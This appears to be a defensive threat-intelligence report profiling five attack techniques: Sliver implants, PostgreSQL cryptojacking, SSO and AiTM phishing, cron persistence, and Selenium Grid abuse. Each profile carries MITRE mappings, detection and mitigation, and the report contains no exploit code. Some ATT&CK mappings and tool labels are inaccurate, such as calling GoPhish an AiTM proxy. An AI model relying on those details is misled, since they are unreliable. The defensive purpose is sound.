Full Report
Let's break down eight attack patterns security teams should be watching in 2025.
Analysis Summary
# Tool/Technique: Sliver Implant
## Overview
Sliver is a post-exploitation framework and implant observed being deployed rapidly by attackers targeting vulnerable network infrastructure, specifically following the public disclosure of critical vulnerabilities like those in PAN-OS (e.g., CVE-2024-0012, CVE-2024-9474). Its deployment indicates rapid exploitation of edge devices.
## Technical Details
- Type: Malware Implant/Post-Exploitation Framework Component
- Platform: Not explicitly stated, but deployment suggests targeting network appliances/servers (e.g., those running PAN-OS).
- Capabilities: Provides remote access and control as part of an active compromise or post-exploitation phase.
- First Seen: Deployed shortly after CVE-2024-0012 and CVE-2024-9474 disclosures (days after PoCs).
## MITRE ATT&CK Mapping
The deployment of an implant following initial access via RCE (likely exploiting vulnerabilities in PAN-OS) maps broadly to:
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (As the entry vector via vulnerable PAN-OS)
- **TA0003 - Persistence**
- T1543 - Create or Modify System Process (If the implant establishes persistence)
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol (Implied control channel for the implant)
## Functionality
### Core Capabilities
- Establishing a persistent or semi-persistent foothold on compromised systems.
- Facilitating command and control (C2) communications.
### Advanced Features
- Rapid deployment immediately following vulnerability disclosure and PoC release, indicating automation or prioritized targeting of vulnerable edge infrastructure.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [Web shells mentioned alongside Sliver deployment]
- Registry Keys: [N/A in context]
- Network Indicators: [C2 structure would be specific to the deployment, none listed]
- Behavioral Indicators: Execution of unknown binaries or scripts on compromised network devices immediately post-patching window.
## Associated Threat Actors
- Threat actors exploiting newly disclosed, high-impact vulnerabilities in boundary devices (in this context, actors exploiting PAN-OS CVEs).
## Detection Methods
- **Signature-based detection:** Signatures for known Sliver binaries or configuration files, if available.
- **Behavioral detection:** Monitoring for unusual process activity on network appliances (like firewalls or VPN concentrators) where implants are not expected.
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Immediately patch publicly disclosed vulnerabilities (like CVE-2024-0012, CVE-2024-9474). Restrict internet exposure for critical infrastructure management interfaces.
- **Hardening recommendations:** Implement strict network segmentation for infrastructure devices. Enforce vulnerability management SLAs prioritizing public-facing/edge assets.
## Related Tools/Techniques
- Other post-exploitation frameworks like Cobalt Strike, Metasploit.
- Web shells (which were observed being deployed alongside Sliver).
---
# Tool/Technique: Cryptominers (via CPU\_HU Campaign)
## Overview
Cryptominers were deployed by the **CPU\_HU campaign** which specifically targeted misconfigured PostgreSQL servers. The attackers exploited weak or default credentials to gain access, using this access to install cryptomining software for resource abuse (cryptojacking).
## Technical Details
- Type: Malware/Payload (Cryptominer)
- Platform: PostgreSQL environments (Linux/Cloud VMs hosting PostgreSQL).
- Capabilities: Unauthorized utilization of system CPU resources for mining cryptocurrency.
- First Seen: N/A (Part of ongoing trends observed in 2024/2025 retrospection).
## MITRE ATT&CK Mapping
The attack chain involves weak credentials leading to execution and resource usage:
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Implied in malware deployment)
- **TA0007 - Discovery**
- T1018 - Remote System Discovery (Implied, locating other services)
- **TA0015 - Impact**
- T1496 - Resource Hijacking (The core goal of cryptojacking)
## Functionality
### Core Capabilities
- Unauthorized execution of mining software.
- Persistent reinfection via startup mechanisms (like cron jobs).
### Advanced Features
- Use of resilient persistence mechanisms, specifically abusing **cron jobs** in Redis and Jenkins environments to ensure cryptominers relaunch upon reboot.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: Connections to known cryptocurrency mining pools (requires external threat intelligence).
- Behavioral Indicators: Unusually high/sustained CPU utilization on database servers (PostgreSQL, Redis, Jenkins) without legitimate workload traffic.
## Associated Threat Actors
- CPU\_HU campaign.
## Detection Methods
- **Signature-based detection:** Signatures for known mining executables (e.g., XMRig).
- **Behavioral detection:** Monitoring high CPU usage from unexpected processes on database servers. Monitoring for attempts to create or modify entries in system schedule jobs (cron jobs).
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Enforce strong, unique credential policies for all database instances (especially PostgreSQL). Never expose database management interfaces publicly.
- **Hardening recommendations:** Implement Principle of Least Privilege. Regularly audit and disable unused services. Harden container/VM images against persistence mechanisms like cron jobs if they are not required.
## Related Tools/Techniques
- Cryptojacking scripts.
- Abuse of legitimate scheduling functions (cron jobs) for persistence.
---
# Tool/Technique: Phishing (SSO Spoofing & AiTM Proxies)
## Overview
Phishing remains the primary method for identity-based cloud breaches. Two notable techniques observed include:
1. **Credential Harvesting via Spoofed SSO Portals:** Used by actors like **0ktapus** to trick users into submitting credentials via deceptive login pages.
2. **MFA Bypass:** Employed by actors like **Atlas Lion** using Adversary-in-the-Middle (AiTM) proxies and smishing (SMS phishing) to intercept or prompt the user through the MFA process.
## Technical Details
- Type: Technique (Social Engineering/Initial Access)
- Platform: User Endpoints, targeting cloud application login portals (SSO).
- Capabilities: Bypassing baseline security controls (including MFA in some cases) to steal valid user credentials.
- First Seen: Ongoing (0ktapus historically active, AiTM phishing on the rise).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.001 - Phishing: Spearphishing Attachment (General category, includes techniques below)
- **TA0006 - Credential Access**
- T1555.005 - Credentials from Web Session Cookie (If AiTM captures session tokens)
- **T1078.004 - Valid Accounts: Cloud Accounts** (The result of successful phishing)
## Functionality
### Core Capabilities
- Deception leading to credential submission (0ktapus).
- Interception of authentication tokens or coercion of MFA approval (Atlas Lion via AiTM/Smishing).
### Advanced Features
- **AiTM Proxies:** Tools capable of proxying the legitimate login session, allowing the attacker to relay MFA prompts in real-time before the session cookie is established or used.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: User login attempts sourced from anomalous geographic locations or coming *from* the attacker's infrastructure back to the SSO provider (indicative of AiTM relay).
- Behavioral Indicators: Users typing credentials into external, non-corporate domains, or successive, rapid, failed authentication attempts followed by a successful login from a different location/IP (indicating token replay).
## Associated Threat Actors
- 0ktapus
- Atlas Lion
## Detection Methods
- **Signature-based detection:** Detecting known phishing domains used by these campaigns.
- **Behavioral detection:** Monitoring SSO logs for location anomalies (impossible travel) linked to credential submission. Monitoring for the use of AiTM proxies (e.g., GoPhish, Evilginx).
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Implement robust MFA (e.g., FIDO2/Hardware keys that resist phishing) over SMS/TOTP where possible. Deploy network controls to block access to known phishing sites.
- **Hardening recommendations:** Conditional Access Policies based on device health, IP reputation, and risk scoring. User training focused on identifying spoofed SSO portals and suspicious smishing attempts.
## Related Tools/Techniques
- Smishing
- Adversary-in-the-Middle (AiTM) proxies (e.g., Evilginx).
---
# Tool/Technique: Persistence via Cron Jobs
## Overview
Attackers are embedding persistence mechanisms early by leveraging legitimate, recurring task schedulers, specifically **cron jobs** on Linux/Unix-like systems. This technique was observed being used to ensure cryptominers remain active even after a system reboot, particularly targeting Redis and Jenkins environments.
## Technical Details
- Type: Technique (Persistence)
- Platform: Linux/Unix-like cloud instances (observed in Redis and Jenkins environments).
- Capabilities: Ensures command execution upon system startup or regular intervals, bypassing process monitoring that might only look at initial execution.
- First Seen: N/A (Standard persistent technique adapted for cloud persistence).
## MITRE ATT&CK Mapping
- **TA0003 - Persistence**
- T1053.003 - Scheduled Task/Job: Cron Job
## Functionality
### Core Capabilities
- Scheduling the execution of payloads (like cryptominers) to run automatically.
### Advanced Features
- Resilience: Cron jobs represent a resilient form of persistence that often lives outside of typical malware droppers or service modifications, sometimes evading basic host monitoring.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: [N/A in context]
- Behavioral Indicators: Unauthorized creation or modification of crontab files (e.g., `/etc/crontab`, user crontabs, or `/etc/cron.d/` directories).
## Associated Threat Actors
- Attackers deploying cryptominers (CPU\_HU campaign mentioned in relation to persistence).
## Detection Methods
- **Signature-based detection:** [Less effective for this technique as it uses native OS functions]
- **Behavioral detection:** File integrity monitoring (FIM) or endpoint detection/response (EDR) alerts on writes to configuration files related to cron jobs or the execution of `/usr/bin/crontab` with unexpected arguments.
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Strictly limit who can modify system-level scheduling configurations. Use immutable infrastructure principles where possible.
- **Hardening recommendations:** Regularly audit cron job configurations on all cloud workloads for unauthorized entries. Ensure running services (like Redis/Jenkins) are configured with the least necessary privileges to prevent system configuration changes.
## Related Tools/Techniques
- Scheduled Task/Job (Windows equivalent: T1053.005).
- Abuse of services files (e.g., systemd units).
---
# Tool/Technique: Abuse of Unauthenticated Selenium Grid
## Overview
Unauthenticated instances of **Selenium Grid** were abused to execute arbitrary payloads via browser automation instructions. This leverages the control plane of the automation framework as an execution vector when proper authentication is missing.
## Technical Details
- Type: Technique (Execution/Lateral Movement)
- Platform: Systems running Selenium Grid instances accessible externally due to lack of authentication.
- Capabilities: Remote code execution or command injection via Selenium's API endpoints when authentication controls are absent.
- First Seen: N/A (Exploitation of configuration errors).
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
- T1204.001 - User Execution: Malicious File (If browser interaction leads to file execution)
- **TA0008 - Lateral Movement**
- T1021.001 - Remote Services: Remote Desktop Protocol (If used to interact with a remote desktop via the browser context)
- **T1129 - Execution through Remote Services** (Applicable if the Selenium API is treated as a remote service gateway)
## Functionality
### Core Capabilities
- Leveraging browser automation capabilities (driven by Selenium Grid commands) to execute arbitrary code or deliver payloads on the host running the browser instance controlled by the Grid node.
### Advanced Features
- Exploits common cloud visibility gaps: Many teams monitor web servers but overlook the security posture of dedicated automation/testing infrastructure like Selenium Grid.
## Indicators of Compromise
- File Hashes: [N/A in context]
- File Names: [N/A in context]
- Registry Keys: [N/A in context]
- Network Indicators: Connections directed at the Selenium Grid hub/node API ports requesting undocumented or suspicious browser actions.
- Behavioral Indicators: Observed network traffic patterns consistent with automated browser interaction originating from the Selenium Grid nodes that should only be performing non-malicious testing.
## Associated Threat Actors
- General exploitation of misconfigurations.
## Detection Methods
- **Signature-based detection:** [Generally ineffective for configuration abuse]
- **Behavioral detection:** Network flow analysis showing unexpected outbound connections or system calls originating from the Selenium Grid process.
- **YARA rules:** [N/A in context]
## Mitigation Strategies
- **Prevention measures:** Enforce strong authentication for all administrative and API endpoints, including automation frameworks like Selenium Grid.
- **Hardening recommendations:** Run non-trusted automation tasks in highly isolated sandboxed environments (e.g., ephemeral containers that are destroyed after use). Never expose Selenium Grid management interfaces to the public internet.
## Related Tools/Techniques
- Abuse of other testing/automation frameworks (e.g., Jenkins, if unauthenticated).